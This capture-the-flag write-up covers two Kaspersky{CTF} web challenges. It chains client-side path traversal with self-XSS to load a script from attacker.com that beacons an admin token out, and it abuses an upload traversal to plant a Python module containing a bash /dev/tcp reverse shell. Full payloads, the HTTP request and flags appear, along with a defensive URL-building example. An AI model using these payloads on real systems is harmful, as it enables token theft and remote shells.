as3617

Kaspersky{CTF} - Bubble: rerevenge, Peach Investor writeup

Bubble: ReRevenge

Vulnerability

  1. Client Side Path Traversal
    image
    e and t are controlled by path parameters.

image


As shown in the picture above, we can manipulate the API request path using path traversal.

  2. Self XSS
    image
    When writing a post, self-XSS occurs in the preview function.

Chaining

The admin bot works as follows.

  1. Register
  2. add post with flag
  3. visit post
  4. write comment with post's author name
  5. back to dashboard, and write new post

In step 4, the client-side path traversal vulnerability also occurs.

So we can get a draft saved that contains our username.

If our username contains an XSS payload, we get XSS when the admin bot performs step 5.

Payload

  1. Change username to the payload below; af.js is the script loaded from attacker.com:
     af.js -> navigator.sendBeacon("https://webhook",localStorage.getItem("DiarrheaTokenBearerInLocalStorageForSecureRequestsContactAdminHeKnowsHotToUseWeHaveManyTokensHereSoThisOneShouldBeUnique"))
     @[youtube srcdoc=<script/src=//attacker.com/af.js></script>]
  2. Report the URL:
     https://bubble-tea-rerevenge.task.sasc.tf/post/USER_UUID/posts/506%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2fapi%2fdrafts%2fsave%23
  3. Get the flag using the admin session token.
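Added example, not code from the writeup or the challenge: why the `.%09.` segments in the report URL can still act as `..` once the client builds its API request, and how a client-side path builder can refuse such input. It assumes the router hands the decoded segment to a function that splices it into an API URL; `API_BASE`, `buildApiUrlNaive`, `buildApiUrlSafe` and the sample id are my own names and a constructed input, and the tab-stripping explanation is my reading of the payload, not something the writeup states.

```javascript
// Constructed placeholder origin, not the challenge host.
const API_BASE = "https://app.example/api/posts/";

// Vulnerable pattern: the decoded path parameter is spliced straight into the
// request URL. The WHATWG URL parser used by browsers and Node removes ASCII
// tab and newline before parsing, so ".\t." becomes ".." and is then resolved
// as a dot-segment, letting the request leave /api/posts/ even if a naive
// check for a literal ".." was applied earlier.
function buildApiUrlNaive(postId) {
  return new URL(postId, API_BASE).href;
}

// Hardened: allow-list the id's character set, percent-encode it so "/" "."
// and control characters are literal data, then confirm the resolved URL is
// still under API_BASE (a second line of defence if the allow-list is ever
// loosened).
function buildApiUrlSafe(postId) {
  if (/[^A-Za-z0-9_-]/.test(postId)) {
    throw new Error("post id contains characters outside the allowed set");
  }
  const url = new URL(encodeURIComponent(postId), API_BASE);
  if (!url.href.startsWith(API_BASE)) {
    throw new Error("resolved URL escapes the API base");
  }
  return url.href;
}

// Constructed sample: the shape of the writeup's segment after the router has
// decoded %2f and %09 (two climbs are enough from /api/posts/).
const traversalId = "506/.\t./.\t./drafts/save#";

function demo() {
  const naive = buildApiUrlNaive(traversalId); // resolves to /api/drafts/save
  let safe;
  try {
    safe = buildApiUrlSafe(traversalId);
  } catch (e) {
    safe = "rejected: " + e.message;
  }
  return { naive, safe, benign: buildApiUrlSafe("506") };
}
```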

FLAG : kaspersky{6ruh_6um6l3_1s_n0_m0r3}

Peach Investor

Vulnerability

  1. File upload vulnerability
    image

We can upload any file without restriction.
Also, no validation exists for the source parameter, so we can upload files to any location via directory traversal.

Exploit

image

In the Docker container, I saw that the Celery scheduler imports an unfamiliar module (billiard).
We can use this to get a shell.

If we create a directory called billiard and upload an __init__.py with a reverse shell in it, our code will run when the scheduler is executed.

Payload

POST /upload?source=../billiard HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en,ko;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 269
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Host: 409fe342-33f9-4f27-b317-398f174974ee.kit.sasc.tf
Origin: http://localhost:8000
Pragma: no-cache
Referer: http://localhost:8000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Content-Disposition: form-data; name="file"; filename="__init__.py"
Content-Type: application/json

import os
os.system("/bin/bash -c 'bash -i > /dev/tcp/IP/1234 0>&1'")
------WebKitFormBoundaryBB3U3Fw3boGnqJKQ--

FLAG: kaspersky{p41d_w17h_c4sh_4nd_3nd3d_up_s0_s35h}
